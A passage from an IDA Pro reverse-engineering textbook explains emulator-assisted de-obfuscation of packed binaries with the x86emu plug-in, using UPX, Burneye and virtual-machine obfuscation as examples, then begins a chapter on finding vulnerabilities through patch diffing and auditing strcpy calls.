reduce the amount of time required to de-obfuscate an IDA database. Emula-

tors can fill the void between scripts and debuggers and have the advantage

of being both more efficient than scripts and more flexible than debuggers.

Using emulators, for example, it is possible to emulate a MIPS binary on

an x86 platform or to emulate instructions from a Linux ELF binary on a

Windows platform.

Emulators vary in sophistication. At a minimum, an emulator requires a

stream of instruction bytes and sufficient memory to dedicate to stack opera-

tions and CPU registers. More sophisticated emulators may provide access to

emulated hardware devices and operating system services.

IDA does not offer a native emulation facility,33 but its plug-in architec-

ture is sophisticated enough to allow for the creation of emulator-type plug-

ins. One possible implementation of such an emulator treats the IDA data-

base as virtual memory that happens to contain the mapped binary we wish to

emulate (courtesy of a loader module). All that is required of an emulator

plug-in is to provide a small amount of memory to track the state of all CPU

registers and some means to implement a stack. One approach implements

a stack by creating a new segment within the database mapped to a location

suitable for a stack. The emulator operates by reading bytes from the data-

base location specified by the current value of the the emulator’s instruc-

tion pointer, decoding the retrieved values according to the emulated CPU’s

instruction set specification, and updating any memory values affected by the

decoded instruction. Possible updates might include modifying emulated reg-

ister values, storing values into the emulated stack memory space, or patch-

ing modified values into the data or code sections within the IDA database as

dictated by memory addresses generated by the decoded instruction. Control

of the emulator could be similar to control of a debugger in that instructions

could be stepped through, memory could be examined, registers could be

modified, and breakpoints could be set. Memory contents within the program

32. See http://www.idabook.com/examples/chapter21/ for one such example.

33. IDA does ship with a plug-in capable of interfacing with open source Bochs emulator via

IDA’s debugging interface. Please refer to Chapters 24 through 26 for more information.

Obfuscated Code Analysis 461

memory space would be displayed courtesy of IDA’s disassembly and hex

views, while the emulator would be required to generate its own displays for

the CPU registers.

Using such an emulator, an obfuscated program may be de-obfuscated

by initiating emulation at the program entry point and stepping through

the instructions that constitute the de-obfuscation phase of the program.

Because the emulator utilizes the database as its backing memory, all self-

modifications are reflected immediately as changes in the database. By the

time the de-obfuscation routine has completed, the database has been trans-

formed into the correct de-obfuscated version of the program, just as if the

program had been running under debugger control. An immediate advan-

tage of emulation over debugging is that potentially malicious code is never

actually executed by an emulator, whereas debugger-assisted de-obfuscation

must allow at least some portion of the malicious program to execute in

order to obtain the de-obfuscated version of the program.

The ida-x86emu (x86emu) plug-in is an example of an emulator plug-in

that is designed to offer emulation of the x86 instruction set. The plug-in is

open source and builds with all versions of the IDA SDK from 4.9 onward.

Binary versions of the plug-in compiled for all versions of IDA are included

with the x86emu distribution. The plug-in is designed for use with either the

Windows GUI version or the Qt version of IDA and includes build scripts,

which allow the plug-in to be built using either MinGW (g++/make) or

Microsoft (Visual Studio 2008) tools. The Qt version of the plug-in is also

compatible with the Linux and OS X versions of IDA. Other than the appro-

priate SDK for your version of IDA, the plug-in has no other dependencies.

The plug-in is installed by copying the compiled plug-in binary (x86emu.plw/

x86emu_qt.plw) into <IDADIR>/plugins.

No plug-in configuration is required, and the emulator is activated using

the ALT-F8 key sequence by default. The plug-in may be activated only for

binaries that make use of the x86 processor, and the plug-in may be used

with binaries of any file type, such as PE, ELF, and Mach-O. The plug-in may

be built from source using the tools (Visual Studio or MinGW’s gcc and make)

discussed in Chapter 17.

Name ida-x86emu

Author Chris Eagle

Distribution Source for SDK v6.1 and binaries for all versions of IDA from 5.0, including

IDA Freeware. Source is backward compatible to SDK version 4.9.

Price Free

Description Embedded x86 instruction emulator for IDA

Information http://www.idabook.com/ida-x86emu/

462 Chapter 21

x86emu Initialization

When the x86emu plug-in is activated, the plug-in control dialog shown in

Figure 21-4 is displayed. The basic display shows register values and provides

button controls used to perform simple emulation tasks such as stepping the

emulator or modifying data values.

Figure 21-4: x86emu emulator control dialog

Upon initial activation, the plug-in carries out a number of additional

actions. For all file types, the emulator creates new database segments named

.stack and .heap in order to provide runtime memory support for emulated

program operations. The first time the plug-in is activated within a particular

binary, the current cursor location is used to initialize the instruction pointer

(EIP). For Windows PE binaries, the plug-in performs the following additional

tasks:

1. Creates an additional program segment named .headers, rereads the

input binary file, and then loads the MS-DOS and PE header bytes into

the database.

2. Allocates memory to emulate a thread environment block (TEB) and a

process environment block (PEB). These structures are populated with

reasonable values in an attempt to convince the program being emulated

that it is running within an actual Windows environment.

3. Assigns reasonable values to the x86 segment registers and configures a

fake interrupt descriptor table in order to provide a minimal exception-

handling capability.

4. Attempts to locate all DLLs referenced in the PE file’s import directory.

For each such DLL that is found, the emulator creates additional segments

within the database and loads the DLL’s headers and export directory.

The binary’s import table is then populated with function addresses

derived from the loaded DLL information. Note that no code from any

of the imported DLLs is loaded into the database.

The current state of the plug-in (register values) is saved in a netnode

each time the database is saved or closed. Additional memory state such as

stack and heap values is saved as well because these values are stored within

dedicated segments in the database. Upon subsequent activation, the emulator

state is restored from existing netnode data.

Obfuscated Code Analysis 463

Basic x86emu Operation

The emulator control dialog is intended to provide capabilities similar to

those of a very basic debugger. CPU register contents may be altered by

entering a new value into the desired register’s edit box.

The Step button is used to emulate a single instruction. A single instruc-

tion is emulated by reading one or more bytes from the database location

specified by the EIP register and carrying out any actions specified by the

instruction bytes. Where required, register display values are updated to

reflect changes resulting from the emulation of the current instruction.

Each time the Step button is clicked, the emulator ensures that the bytes at

the address specified by EIP are displayed as code (rather than data). This

feature helps defeat any desynchronization attempts that may occur within

the instruction stream. In addition, the emulator jumps the disassembly dis-

play window to the location specified by EIP so that the display tracks along

with each emulated instruction.

The Run To Cursor button may be used to emulate an entire sequence

of instructions at one time. Emulation continues from the current EIP loca-

tion and does not stop until a breakpoint is reached or EIP is equal to the

current cursor location. The emulator recognizes breakpoints set via IDA’s

debugger interface (right-click the desired address and select Add breakpoint)

or breakpoints set via the emulator’s own breakpoint interface, Emulate

Set Breakpoint.

Once Run To Cursor has been selected, the emulator does not pause to

reformat the disassembly for each fetched instruction; instead it formats only

the first and last instructions executed. For long instruction sequences, the

overhead associated with reformatting the disassembly at each instruction

would result in intolerably slow performance of the emulator. You should use

the Run To Cursor command very carefully, as control of the emulator (and

IDA) will not be regained until EIP reaches the cursor location. If, for any

reason, execution never hits a breakpoint or fails to reach the cursor loca-

tion, you may be required to forcibly terminate IDA, potentially losing valu-

able work.

The Skip button is used to advance the emulator by exactly one instruc-

tion without emulating that instruction. One potential use of the Skip com-

mand is to skip over a conditional jump in order to reach a specific block

of code regardless of the state of any condition flags. Skip is also useful for

x86EMU BREAKPOINTS

The emulator does not make use of hardware debug registers or software interrupts

such as the int 3 instruction. Instead, the emulator maintains an internal list of

breakpoints against which the emulated instruction pointer is compared prior to

emulating each instruction. While this may seem inefficient, it is no more inefficient

than emulation in general, and it offers the advantage that emulator breakpoints are

undetectable, and unalterable, by the program being emulated.

464 Chapter 21

skipping over calls to imported library functions whose code is not available

for emulation. Should you elect to skip over a function call, make certain

that you update the database to reflect any changes that the function would

have made. Examples of such changes include modifying the value of EAX

to reflect the desired function return value or populating a buffer whose

address was passed to the function. Additionally, if the skipped function uses

the stdcall calling convention, you should also be careful to manually adjust

ESP according to the number of bytes that the skipped function would have

cleared from the stack upon return.

The Jump To Cursor button causes EIP to be updated with the address of

the current cursor location. This feature may be used to skip entire sections

of code or to follow a conditional jump when the state of the CPU flags may

not cause the jump to be taken otherwise. Keep in mind that jumping around

within a function may have consequences on stack layout (if you skip over

a push or stack pointer adjustment, for example), resulting in unexpected

behaviors. Note that it is not necessarily the intention of the emulator that

emulation begins with the entry point of a program. It is entirely possible

to use the emulator to emulate a single function within a binary in order to

study the behavior of that function. This is one of the motivations behind

the inclusion of the Jump to Cursor button, to allow easy redirection of your

emulation efforts within a binary.

The Run button is similar in functionality to the Run To Cursor button;

however, it is more dangerous in that execution continues until a breakpoint

is reached. You should be absolutely certain that one of your breakpoints will

be reached if you elect to use this command.

The Segments button provides access to configuration for x86 segment

registers and segment base addresses. Figure 21-5 shows the resulting dialog

used to alter segment-related values.

Figure 21-5: x86emu segment register

configuration

While the emulator’s address computations honor the supplied base

values, the emulator does not currently provide a complete emulation of

the x86 global descriptor table (GDT).

The Set Memory button provides access to a basic memory modification

dialog, as shown in Figure 21-6.

Obfuscated Code Analysis 465

Figure 21-6: x86emu memory modification

dialog

This dialog is essentially a wrapper around some of the SDK PatchXXX

functions. The type of data to be inserted into the database is selected via

the provided radio buttons, while the actual data is entered into the pro-

vided edit control. If the Load from file radio button is selected, the user is

presented with a standard file-open dialog to select a file whose content is

transferred into the database beginning at the specified address.

The Push Data button is used to place data values onto the top of the

emulated program stack. The resulting dialog, shown in Figure 21-7, may be

used to specify one or more data items that will be pushed onto the stack.

Figure 21-7: x86emu stack data dialog

The emulator currently accepts only numeric data. Supplied values are

pushed, as 4-byte quantities, onto the emulation stack in right-to-left order as

if they were parameters to a function call. The value of the stack pointer is

adjusted according to the number of values pushed onto the stack. The

intended use of this dialog is to configure function parameters prior to jump-

ing directly to the function to be emulated. This allows a function to be

emulated without requiring users to find an actual execution path to the

function.

Emulator-Assisted De-obfuscation

At this point we are ready to discuss the use of x86emu as a de-obfuscation

tool. We begin by returning to the Burneye example for which we developed

an entire IDC script. Assuming that we have no prior knowledge of the

Burneye decoding algorithm, de-obfuscation would proceed as follows.

1. Open the Burneye protected binary. The cursor should be automatically

positioned at the start entry point. Activate the emulator (ALT-F8). Fig-

ure 21-4 shows the resulting state of the emulator.

466 Chapter 21

2. Begin stepping the emulator, paying close attention to the instructions

that are about to be emulated. After six steps, the emulator arrives at

function sub_5371048 (see Listing 21-3).

3. This function appears to be fairly well structured. We could choose to

step the emulator for a while to obtain a better sense of the flow of exe-

cution, or we could choose to study the function for a while and deter-

mine if it is safe to position the cursor at the function’s return statement

and click Run To Cursor. Opting for the latter, we position the cursor at

address 05371081h and click Run To Cursor.

4. At this point the de-obfuscation is complete. Stepping the emulator

two more times executes the return statement, returning the the newly

de-obfuscated code, and causes IDA to reformat the de-obfuscated bytes

as instructions.

The resulting de-obfuscated code is shown here:

LOAD:05371082 loc_5371082: ; CODE XREF: start+EÇj

LOAD:05371082 call sub_5371048

LOAD:05371082 ; --------------------------------------------------------------

LOAD:05371087 db 0

LOAD:05371088 db 0

LOAD:05371089 db 0

LOAD:0537108A db 0

LOAD:0537108B db 0

LOAD:0537108C db 0

LOAD:0537108D db 0

LOAD:0537108E db 0

LOAD:0537108F db 0

LOAD:05371090 ; --------------------------------------------------------------

LOAD:05371090

LOAD:05371090 loc_5371090: ; DATA XREF: LOAD:off_5371008Ço

X LOAD:05371090 pushf

LOAD:05371091 pop ebx

LOAD:05371092 mov esi, esp

LOAD:05371094 call sub_5371117

LOAD:05371099 mov ebp, edx

LOAD:0537109B cmp ecx, 20h

LOAD:0537109E jl loc_53710AB

LOAD:053710A4 xor eax, eax

LOAD:053710A6 jmp loc_53710B5

Comparing this listing to that of Listing 21-2, it is clear that the instruc-

tions have changed as a result of the de-obfuscation process. Following the

initial de-obfuscation, execution of the program resumes with the pushf

instruction X at loc_5371090.

Emulator-assisted de-obfuscation is clearly easier than the script-oriented

de-obfuscation process followed earlier. Time spent developing the emulator

approach pays off with a highly flexible de-obfuscation alternative, whereas

time spent developing a Burneye-specific script pays off in a very specialized

script that is of little use in other de-obfuscation scenarios.

Obfuscated Code Analysis 467

Note that while the Burneye-protected binary in the previous example

was a Linux ELF binary, x86emu has no problems emulating the instructions

within the binary because they are all x86 instructions, regardless of the

operating system and file type that they were taken from. x86emu can be

used just as easily on a Windows PE binary, such as the UPX example discussed

earlier in this chapter. Because of the fact that the overwhelming majority of

obfuscated malware in existence today is targeted at the Windows platform,

x86emu contains many features specific to Windows PE binaries (as detailed

earlier).

Using the emulator to uncompress a UPX binary is very straightforward.

The emulator should be launched with the cursor positioned on the program

entry point (start). Next, the cursor can be moved to the first instruction of

the UPX import table, rebuilding loops (address 0040886Ch in Listing 21-1),

and the emulator can be allowed to run using the Run To Cursor command.

At this point, the binary has been unpacked, and the Strings window can be

used to view all of the unpacked library and function names that will be used

by UPX to build the program’s import tables. If the emulator is stepped

through the code of Listing 21-1, the following function call will eventually

be encountered:

UPX1:00408882 call dword ptr [esi+808Ch]

Instructions of this sort can be dangerous to emulate, as it is not imme-

diately apparent where the instruction may lead (meaning that the destina-

tion address of the call instruction is not obvious). In general, function calls

can lead to one of two places: a function within the program’s code (.text)

segment or a function within a shared library being used by the program.

Whenever a call instruction is encountered, the emulator determines whether

the target address lies within the virtual address space of the file being analyzed

or whether the target address correlates to a function that is being exported

by one of the libraries that the binary has loaded. Recall that for PE binaries

the emulator loads the export dictionaries of all libraries loaded by the binary

being analyzed. When the emulator determines that the target address of a

call instruction lies outside the bounds of the binary, the emulator scans the

export tables that were loaded into the database in order to determine which

library function is being called. For Windows PE files, the emulator contains

emulated implementations of the functions listed in Table 21-1.

When the emulator determines that one of these functions has been

called, it reads any parameters from the program stack and either carries out

the same actions that the actual function would carry out if the program were

actually running or performs some minimal action and generates a return

value that will appear to be correct from the perspective of the emulated

program. In the case of stdcall functions, the emulator properly removes

any stack arguments prior to completing the emulated function.

468 Chapter 21

Emulated behavior for the heap-related functions causes the emulator

to manipulate its internal heap implementation (backed by the .heap section)

and return a value appropriate to the function being emulated. For example,

the value returned by the emulated version of HeapAlloc is an address that

is suitable for the emulated program to write data to. When the emulated

version of VirtualAlloc is called, a new section is created in the database to

represent the newly mapped virtual address space. The emulated version of

IsDebuggerPresent always returns false. When emulating LoadLibraryA, the emu-

lator extracts the name of the library being loaded by examining the stack

arguments provided to LoadLibraryA. The emulator then attempts to open the

named library on the local system so that library’s export table can be loaded

into the database, and an appropriate library handle34 value is returned to

the caller. When a call to GetProcAddress is intercepted, the emulator exam-

ines arguments on the stack to determine which shared library is being refer-

enced; then the emulator parses the library’s export table in order to compute

the proper memory address of the requested function, which is then returned

to the caller. Calls to LoadLibraryA and GetProcAddress are noted in the IDA

Output window.

When a function for which x86emu has no internal emulation is called, a

dialog similar to the one shown in Figure 21-8 is displayed.

Knowing the name of the function being called, the emulator queries

IDA’s type library information to obtain the number and types of parameters

required by the function. The emulator then digs into the program stack to

display all of the arguments that have been passed to the function, along with

the type of the argument and the formal parameter name of the argument.

Argument types and names are displayed only when type information is

available from IDA. The dialog also offers the user a chance to specify a return

value, as well as the opportunity to specify the calling convention used by the

function (this information may be available from IDA). When the stdcall

calling convention is selected, the user should indicate how many arguments

(not bytes) should be removed from the stack when the call completes. This

information is required in order for the emulator to maintain the integrity of

the execution stack across emulated function calls.

Table 21-1:

Functions Emulated by x86emu

CheckRemoteDebuggerPresent GetTickCount LocalFree VirtualAlloc

CreateThread GetVersion NtQuerySystemInformation VirtualFree

GetCurrentThreadId HeapAlloc NtQueryInformationProcess calloc

GetCurrentProcess HeapCreate NtSetInformationThread free

GetCurrentProcessId HeapDestroy RtlAllocateHeap lstrcat

GetModuleHandleA HeapFree TlsAlloc lstrcpy

GetProcAddress IsDebuggerPresent TlsFree lstrlen

GetProcessHeap LoadLibraryA TlsGetValue malloc

GetThreadContext LocalAlloc TlsSetValue realloc

34. A Windows library handle uniquely identifies a library within a Windows process. A library

handle is actually the base address at which the library is loaded into memory.

Obfuscated Code Analysis 469

Figure 21-8: x86emu library function dialog

Returning to the UPX de-obfuscation example, and allowing the emulator

to complete the import table reconstruction loops, we would find that the

emulator generates output such as the following in IDA’s Output window:

x86emu: LoadLibrary called: KERNEL32.DLL (7C800000)

x86emu: GetProcAddress called: ExitProcess (0x7C81CDDA)

x86emu: GetProcAddress called: ExitThread (0x7C80C058)

x86emu: GetProcAddress called: GetCurrentProcess (0x7C80DDF5)

x86emu: GetProcAddress called: GetCurrentThread (0x7C8098EB)

x86emu: GetProcAddress called: GetFileSize (0x7C810A77)

x86emu: GetProcAddress called: GetModuleHandleA (0x7C80B6A1)

x86emu: GetProcAddress called: CloseHandle (0x7C809B47)

This output provides a record of the libraries that the obfuscated binary is

loading and the functions within those libraries that the obfuscated program

is resolving.35 When function addresses are looked up in this manner, they

are often saved in an array (this array is the program’s import table) for

later use.

A fundamental problem with de-obfuscated programs is that they lack

the symbol table information that is usually present in un-obfuscated binaries.

When a binary’s import table is intact, IDA’s PE loader names each entry in

the import table according to the name of the functions whose address it

will contain at runtime. When an obfuscated binary is encountered, it is use-

ful to apply function names to each location in which a function address is

stored. In the case of UPX, the following lines from Listing 21-1 show how

function addresses are saved into memory with each pass through the func-

tion lookup loop:

UPX1:00408897 call dword ptr [esi+8090h] ; GetProcAddress

UPX1:0040889D or eax, eax

UPX1:0040889F jz short loc_4088A8

35. Once a program has used GetProcAddress to find the address of a function, the program may

call that function anytime it wishes using the returned address. Looking up function addresses

in this manner eliminates the need to explicitly link to the functions at build time and reduces

the amount of information that can be extracted by static analysis tools such as dumpbin.

470 Chapter 21

X UPX1:004088A1 mov [ebx], eax ; Save to import table

UPX1:004088A3 add ebx, 4

The instruction at address 004088A1h X is responsible for storing function

addresses into the import table as it is reconstructed. x86emu provides an

automated facility for naming each import table entry provided that an instruc-

tion such as this can be identified. The emulator terms such an instruction

an import address save point, and you may designate an address as such using

the EmulateWindowsSet Import Address Save Point menu option. This

designation must be made before the instruction is emulated in order for

this functionality to work. Following designation, each time the instruction is

emulated, the emulator will perform a lookup to determine what function

is referenced by the data being written and then name the address being

written using the name of the imported function. In the UPX example,

making no effort to clean up the import table would yield the (partial)

import table shown here:

UPX0:00406270 dd 7C81CDDAh

UPX0:00406274 dd 7C80C058h

UPX0:00406278 dd 7C80DDF5h

UPX0:0040627C dd 7C8098EBh

However, the automated naming that is performed when an import

address save point is designated yields the following automatically generated

(partial) import table.

UPX0:00406270 ; void __stdcall ExitProcess(UINT uExitCode)

UPX0:00406270 ExitProcess dd 7C81CDDAh ; DATA XREF: j_ExitProcessÇr

UPX0:00406274 ; void __stdcall ExitThread(DWORD dwExitCode)

UPX0:00406274 ExitThread dd 7C80C058h ; DATA XREF: j_ExitThreadÇr

UPX0:00406278 ; HANDLE __stdcall GetCurrentProcess()

UPX0:00406278 GetCurrentProcess dd 7C80DDF5h ; DATA XREF: j_GetCurrentProcessÇr

UPX0:0040627C ; HANDLE __stdcall GetCurrentThread()

UPX0:0040627C GetCurrentThread dd 7C8098EBh ; DATA XREF: j_GetCurrentThreadÇr

With the import table reconstructed in this manner, IDA is able to

properly annotate calls to library functions using parameter-type information

extracted from its type libraries, and the overall quality of the disassembly is

significantly enhanced.

Additional x86emu Features

The emulator contains several additional features that you may find

useful. The following list details some of these capabilities.

FileDump This menu option allows the user to specify a range of

database addresses to be dumped to a file. By default, the range extends

from the current cursor location to the maximum virtual address present

in the database.

Obfuscated Code Analysis 471

FileDump Embedded PE Many malware programs contain embedded

executables, which they install on target systems. This menu option looks

for a valid PE file at the current cursor position, parses the file’s headers

to determine the size of the file, and then extracts the bytes from the

database to a saved file.

ViewEnumerate Heap This menu option causes the emulator to dump

a list of allocated heap blocks to the Output window, as shown here:

x86emu: Heap Status ---

0x5378000-0x53781ff (0x200 bytes)

0x5378204-0x5378217 (0x14 bytes)

0x537821c-0x5378347 (0x12c bytes)

EmulateSwitch Thread When emulating within a Windows PE file,

x86emu traps calls to the CreateThread function and allocates additional

resources to manage a new thread. Because the emulator has no sched-

uler of its own, you must use this menu option if you want to switch among

multiple threads.

FunctionsAllocate Heap Block This menu option allows the user to

reserve a block of memory within the emulation heap. The user is asked

for the size of the block to reserve. The address of the newly reserved

block is reported to the user. This feature is useful when scratch space is

required during emulation.

FunctionsAllocate Stack Block This menu option allows the user to

reserve a block of memory within the emulation stack. It behaves in a

manner similar to FunctionsAllocate Heap Block.

x86emu and Anti-debugging

While the emulator is not intended to be used a debugger, it must simulate a

runtime environment for the program being emulated. In order to success-

fully emulate many obfuscated binaries, the emulator must not fall victim to

active anti-debugging techniques. Several features of the emulator have been

designed with anti-debugging in mind.

One anti-debugging technique measures time intervals, using the x86

rdtsc instruction, to ensure that a program has not been paused by a debugger.

The rdtsc instruction is used to read the value of an internal time stamp counter

(TSC) and returns a 64-bit value representing the number of clock ticks since

the processor was last reset. The rate at which the TSC increments varies

among CPU types but is roughly once per internal CPU clock cycle. Debuggers

cannot stop the TSC from incrementing, and therefore a process can deter-

mine that it has been stopped for an excessive amount of time by measuring

the difference in the TSC between two successive invocations of rdtsc. x86emu

maintains an internal TSC that it increments with each emulated instruction.

Because the emulated TSC is affected only by emulated instructions, it does

not matter how much actual time elapses between uses of rdtsc. In such cases,

the difference in observed values will always be roughly proportional to the

472 Chapter 21

number of instructions that were emulated between invocations of rdtsc and

should always be small enough to convince the emulated program that no

debugger is attached.

The intentional use of exceptions is another anti-debugging technique

that must be handled by the emulator. The emulator contains very basic

capabilities to mimic the behavior of the Windows structured exception

handling (SEH) process. When the emulated program is a Windows PE

binary, the emulator responds to an exception or software interrupt by con-

structing an SEH CONTEXT structure, locating the current exception handler

by walking the exception handler list via fs:[0], and transferring control to

the installed exception handler. When the exception handler returns, the

emulator restores the CPU state from the CONTEXT structure (which may have

been manipulated within the exception handler).

Finally, x86emu emulates the behavior of the x86 hardware-debug regis-

ters but does not make use of those registers in order to set breakpoints

within an emulated program. As discussed earlier, the emulator maintains

an internal list of user-specified breakpoints that it scans prior to executing

each instruction. Any manipulation of the debug registers within a Windows

exception handler will not interfere with the operation of the emulator.

Virtual Machine-Based Obfuscation

Mentioned earlier in this chapter (in “Opcode Obfuscation” on page 440),

some of the most sophisticated obfuscators reimplement the program they

receive as input, using a custom byte code and associated virtual machine.

When confronting a binary obfuscated in this manner, the only native code

that you might see would be the virtual machine. Assuming you recognize

that you are looking at a software virtual machine, developing a complete

understanding of all of this code generally fails to reveal the true purpose

of the obfuscated program. This is because the behavior of the program

remains buried in the embedded byte code that the virtual machine must

interpret. To fully understand the program, you must, first, locate all of the

embedded byte code and, second, reverse engineer the instruction set of the

virtual machine so you can properly interpret the meaning of that byte code.

By way of comparison, imagine that you knew nothing whatsoever about

Java, and someone handed you a Java virtual machine and a .class file con-

taining compiled byte code and asked you what they did. Lacking any docu-

mentation, you could make little sense of the byte code file, and you would

need to fully reverse the virtual machine to learn both the structure of a

.class file and how to interpret its contents. With an understanding of the

byte code machine language, you could then proceed to understanding the

.class file.

VMProtect is an example of a commercial product that utilizes very

sophisticated virtual machine-based obfuscation techniques. As more of an

academic exercise, TheHyper’s HyperUnpackMe2 challenge binary is a fairly

straightforward example of the use of virtual machines in obfuscation, the

primary challenge being to locate the virtual machine’s embedded byte code

program and determine the meaning of each byte code. In his article on

Obfuscated Code Analysis 473

OpenRCE describing HyperUnpackMe2,36 Rolf Rolles’s approach was to

fully comprehend the virtual machine in order to build a processor module

capable of disassembling its byte code. The processor module then allowed

him to disassemble the byte code embedded within the challenge binary. A

minor limitation to this approach is that it allows you to view either the x86

code within HyperUnpackme2 (using IDA’s x86 module) or the virtual

machine code (using Rolle’s processor module) but not both at the same

time. This obligates you to create two different databases, each using a differ-

ent processor module. An alternative approach takes advantage of the ability

to customize existing processor modules (see “Customizing Existing Proces-

sors” on page 407) through the use of plug-ins, effectively allowing you to

extend an instruction set to include all of the instructions of an embedded

virtual machine. Applying this approach to HyperUnpackMe2 allows us to

view x86 code and virtual machine code together in a single database, as

shown in the following listing:

TheHyper:01013B2F Xh_pop.l R9

TheHyper:01013B32 h_pop.l R7

TheHyper:01013B35 h_pop.l R5

TheHyper:01013B38 h_mov.l SP, R2

TheHyper:01013B3C h_sub.l SP, 0Ch

TheHyper:01013B44 h_pop.l R2

TheHyper:01013B47 h_pop.l R1

TheHyper:01013B4A h_retn 0Ch

TheHyper:01013B4A sub_1013919 endp

TheHyper:01013B4A

TheHyper:01013B4A ; ----------------------------------------------------------

TheHyper:01013B4D dd 24242424h

TheHyper:01013B51 dd 0A9A4285Dh ; TAG VALUE

TheHyper:01013B55

TheHyper:01013B55 ; ============ S U B R O U T I N E =========================

TheHyper:01013B55

TheHyper:01013B55 ; Attributes: bp-based frame

TheHyper:01013B55

TheHyper:01013B55 sub_1013B55 proc near ; DATA XREF: TheHyper:0103AF7A?o

TheHyper:01013B55

TheHyper:01013B55 var_8 = dword ptr -8

TheHyper:01013B55 var_4 = dword ptr -4

TheHyper:01013B55 arg_0 = dword ptr 8

TheHyper:01013B55 arg_4 = dword ptr 0Ch

TheHyper:01013B55

TheHyper:01013B55 Ypush ebp

TheHyper:01013B56 mov ebp, esp

TheHyper:01013B58 sub esp, 8

TheHyper:01013B5B mov eax, [ebp+arg_0]

TheHyper:01013B5E mov [esp+8+var_8], eax

TheHyper:01013B61 mov [esp+8+var_4], 0

TheHyper:01013B69 push 4

TheHyper:01013B6B push 1000h

36. See “Defeating HyperUnpackMe2 With an IDA Processor Module” at http://www.openrce.org/

articles/full_view/28.

474 Chapter 21

Here, the code beginning at X is disassembled as HyperUnpackMe2 byte

code, while the code that follows at Y is displayed as x86 code.

The ability to simultaneously display native code and byte code has been

anticipated by Hex-Rays, which introduced custom datatypes and formats in

IDA 5.7. Custom data formats are useful when IDA’s built-in formatting

options fail to meet your needs. New formatting capabilities are registered

by specifying (using a script or plug-in) a menu name for your format and a

function to perform the formatting. Once you select a custom format for a

data item, IDA will invoke your formatting function each time it needs to

display that data item. Custom datatypes are useful when IDA’s built-in

datatypes are not expressive enough represent the data that you encounter

in a particular binary. Custom datatypes, like custom formats, are registered

using a script or a plug-in. The Hex-Rays example registers a custom data

type to designate virtual machine byte code and displays each byte code as

an instruction by using a custom data format. A drawback to this approach is

that it requires you to locate every virtual machine instruction and explicitly

change its data type. Using a custom processor extension, designating a sin-

gle value as a virtual machine instruction automatically leads to the discovery

of every reachable instruction, because IDA drives the disassembly process

and the processor extension discovers new reachable instructions via its

custom_emu implementation.

Summary

Obfuscated programs are the rule rather than the exception when it comes

to malware these days. Any attempts to study the internal operations of a

malware sample are almost certain to require some type of de-obfuscation.

Whether you take a debugger-assisted, dynamic approach to de-obfuscation

or whether you prefer not to run potentially malicious code and instead use

scripts or emulation to de-obfuscate your binaries, the ultimate goal is to pro-

duce a de-obfuscated binary that can be fully disassembled and properly ana-

lyzed. In most cases, this final analysis will be performed using a tool such as

IDA. Given this ultimate goal (of using IDA for analysis), it makes some sense

to attempt to use IDA from start to finish. The techniques presented in this

chapter are intended to demonstrate that IDA is capable of far more than

generating disassembly listings. In Chapter 25 we will revisit obfuscated code

and take a look at how IDA’s debugging features may be leveraged as a de-

obfuscation tool as well.

JMP

EBP

SUB

VULNERABILITY ANALYSIS

Before we get too far into this chapter, we

need to make one thing clear: IDA is not a

vulnerability discovery tool. There, we said it;

what a relief! IDA seems to have attained mysti-

cal qualities in some people’s minds. All too often peo-

ple seem to have the impression that merely opening a

binary with IDA will reveal all the secrets of the universe, that the behavior of

a piece of malware will be fully explained to them in comments automatically

generated by IDA, that vulnerabilities will be highlighted in red, and that IDA

will automatically generate exploit code if you right-click while standing on

one foot in some obscure Easter egg–activation sequence.

While IDA is certainly a very capable tool, without a clever user sitting at

the keyboard (and perhaps a handy collection of scripts and plug-ins), it is

really only a disassembler/debugger. As a static-analysis tool, it can only facil-

itate your attempts to locate software vulnerabilities. Ultimately, it is up to

your skills and how you apply them as to whether IDA makes your search for

vulnerabilities easier. Based on our experience, IDA is not the optimal tool

476 Chapter 22

for locating new vulnerabilities,1 but when used in conjunction with a debug-

ger, it is one of the best tools available for assisting in exploit development

once a vulnerability has been discovered.

Over the past several years, IDA has taken on a new role in discovering

existing vulnerabilities. Initially, it may seem unusual to search for known vul-

nerabilities until we stop to consider exactly what is known about these

vulnerabilities and exactly who knows it. In the closed-source, binary-only

software world, vendors frequently release software patches without dis-

closing exactly what has been patched and why. By performing differential

analysis between new patched versions of a piece of software and old

unpatched versions of the same software, it is possible to isolate the areas

that have changed within a binary. Under the assumption that these changes

were made for a reason, such differential-analysis techniques actually help

to shine a spotlight on what were formerly vulnerable code sequences. With

the search thusly narrowed, anyone with the requisite skills can develop an

exploit for use against unpatched systems. In fact, given Microsoft’s well-

known Patch Tuesday cycle of publishing updates, large numbers of security

researchers prepare to sit down and do just that once every month.

Considering that entire books exist on the topic,2 there is no way that we

can do justice to vulnerability analysis in a single chapter in a book dedicated

to IDA. What we will do is assume that the reader is familiar with some of the

basic concepts of software vulnerabilities, such as buffer overflows, and dis-

cuss some of the ways that IDA may be used to hunt down, analyze, and ulti-

mately develop exploits for those vulnerabilities.

Discovering New Vulnerabilities with IDA

Vulnerability researchers take many different approaches to discovering new

vulnerabilities in software. When source code is available, it may be possible to

utilize any of a growing number of automated source code–auditing tools

to highlight potential problem areas within a program. In many cases, such

automated tools will only point out the low-hanging fruit, while discovery of

deeper vulnerabilities may require extensive manual auditing.

Tools for performing automated auditing of binaries offer many of the

same reporting capabilities offered by automated source-auditing tools. A

clear advantage of automated binary analysis is that no access to the applica-

tion source code is required. Therefore, it is possible to perform automated

analysis of closed-source, binary-only programs. Veracode3 is an example of a

company that offers a subscription-based service in which users may submit

binary files for analysis by Veracode’s proprietary binary-analysis tools. While

there is no guarantee that such tools can find any or all vulnerabilities within

1. In general, far more vulnerabilities are discovered through fuzz testing than through static

analysis.

2. For example, see Jon Erickson’s Hacking: The Art of Exploitation, 2nd Edition (http://nostarch

.com/hacking2.htm).

3. See http://www.veracode.com/.

Vulnerability Analysis 477

a binary, these technologies bring binary analysis within reach of the average

person seeking some measure of confidence that the software she uses is free

from vulnerabilities.

Whether auditing at the source or binary level, basic static-analysis tech-

niques include auditing for the use of problematic functions such as strcpy and

sprintf, auditing the use of buffers returned by dynamic memory-allocation

routines such as malloc and VirtualAlloc, and auditing the handling of user-

supplied input received via functions such as recv, read, fgets, and many

other similar functions. Locating such calls within a database is not difficult.

For example, to track down all calls to strcpy, we could perform the following

steps:

1. Find the strcpy function.

2. Display all cross-references to the strcpy function by positioning the cur-

sor on the strcpy label and then choosing ViewOpen SubviewsCross

References.

3. Visit each cross-reference and analyze the parameters provided to strcpy

to determine whether a buffer overflow may be possible.

Step 3 may require a substantial amount of code and data-flow analysis

